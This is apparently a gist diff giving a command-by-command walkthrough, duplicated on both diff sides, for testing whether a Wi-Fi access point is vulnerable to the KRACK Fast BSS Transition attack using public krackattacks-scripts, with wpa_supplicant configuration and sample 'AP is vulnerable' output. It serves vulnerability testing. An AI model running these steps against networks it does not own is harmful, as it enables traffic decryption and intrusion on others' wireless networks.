milo2012 · January 26, 2018 21:40
diff --git a/gistfile1.txt b/gistfile1.txt
 #The below checks if the Wireless Access Points supports FT-PSK key management protocol and how to use the scripts from https://github.com/vanhoefm/krackattacks-scripts to test if the Access Point is vulnerable to KRACK.
 #The link https://github.com/kristate/krackinfo#vendor-response-complete contains list of vendor responses.

 $ git clone https://github.com/vanhoefm/krackattacks-scripts
 $ sh disable-hwcrypto.sh

 #Reboot the system

 #Modify /tmp/wpa_supplicant.conf to something similar to the below. 
 wpa_supplicant -D nl80211 -i wlan0 -c/etc/wpa_supplicant.conf
 '''
 # cat /tmp/wpa_supplicant.conf 
 network={
 	ssid="XXXX"
 	scan_ssid=1
 	key_mgmt=WPA-PSK
 	#key_mgmt=FT-PSK
 	psk="XXXXXXXX"
 }
 '''
 #Run the below command to connect to the Wifi using wpa_supplicant.  This is to make sure you are able to connect to the Wireless network before we test the vulnerability.
 $ wpa_supplicant -D nl80211 -i wlan0 -c/tmp/wpa_supplicant.conf

 #You should see something similar to the below.  That means you are connected to the wireless network.

 wlan0: Associated with XX:XX:XX:XX:XX:XX
 wlan0: WPA: Key negotiation completed with XX:XX:XX:XX:XX:XX [PTK=CCMP GTK=CCMP]

 #Modify /tmp/wpa_supplicant.conf and change the key_mgmt parameter trom WPA-PSK to FT-PSK.  We are now checking if the Access Point supports Fast BSS Transition (FT) handshake.
 #Run the below command to connect to the Wifi using wpa_supplicant
 $ wpa_supplicant -D nl80211 -i wlan0 -c/etc/wpa_supplicant.conf

 #If you are unable to connect to the network using FT-PSK key management, you might not be vulnerable. If you are successfully able to connect to the Wireless network, you can proceed with the below .

 $ cd /pentest/krackattacks-scripts/krackattack
 $ python krack-ft-test.py wpa_supplicant -D nl80211 -i wlan0 -c/tmp/wpa_supplicant.conf

 #Run the below in another terminal.  Replace X.X.X.X with the IP address of the wireless router.
 $ arping -I wlan0 X.X.X.X

 #Check the first terminal window for results (where you run the krack-ft-test.py script).  You should see something simliar to the below if the access point is vulnerable

 Replaying Reassociation Request
 AP transmitted data using IV=1 (seq=0)
 Replaying Reassociation Request
 AP transmitted data using IV=1 (seq=0)
 IV reuse detected (IV=1, seq=0). AP is vulnerable!
	#The below checks if the Wireless Access Points supports FT-PSK key management protocol and how to use the scripts from https://github.com/vanhoefm/krackattacks-scripts to test if the Access Point is vulnerable to KRACK.
	#The link https://github.com/kristate/krackinfo#vendor-response-complete contains list of vendor responses.

	$ git clone https://github.com/vanhoefm/krackattacks-scripts
	$ sh disable-hwcrypto.sh

	#Reboot the system

	#Modify /tmp/wpa_supplicant.conf to something similar to the below.
	wpa_supplicant -D nl80211 -i wlan0 -c/etc/wpa_supplicant.conf
	'''
	# cat /tmp/wpa_supplicant.conf
	network={
	ssid="XXXX"
	scan_ssid=1
	key_mgmt=WPA-PSK
	#key_mgmt=FT-PSK
	psk="XXXXXXXX"
	}
	'''
	#Run the below command to connect to the Wifi using wpa_supplicant. This is to make sure you are able to connect to the Wireless network before we test the vulnerability.
	$ wpa_supplicant -D nl80211 -i wlan0 -c/tmp/wpa_supplicant.conf

	#You should see something similar to the below. That means you are connected to the wireless network.

	wlan0: Associated with XX:XX:XX:XX:XX:XX
	wlan0: WPA: Key negotiation completed with XX:XX:XX:XX:XX:XX [PTK=CCMP GTK=CCMP]

	#Modify /tmp/wpa_supplicant.conf and change the key_mgmt parameter trom WPA-PSK to FT-PSK. We are now checking if the Access Point supports Fast BSS Transition (FT) handshake.
	#Run the below command to connect to the Wifi using wpa_supplicant
	$ wpa_supplicant -D nl80211 -i wlan0 -c/etc/wpa_supplicant.conf

	#If you are unable to connect to the network using FT-PSK key management, you might not be vulnerable. If you are successfully able to connect to the Wireless network, you can proceed with the below .

	$ cd /pentest/krackattacks-scripts/krackattack
	$ python krack-ft-test.py wpa_supplicant -D nl80211 -i wlan0 -c/tmp/wpa_supplicant.conf

	#Run the below in another terminal. Replace X.X.X.X with the IP address of the wireless router.
	$ arping -I wlan0 X.X.X.X

	#Check the first terminal window for results (where you run the krack-ft-test.py script). You should see something simliar to the below if the access point is vulnerable

	Replaying Reassociation Request
	AP transmitted data using IV=1 (seq=0)
	Replaying Reassociation Request
	AP transmitted data using IV=1 (seq=0)
	IV reuse detected (IV=1, seq=0). AP is vulnerable!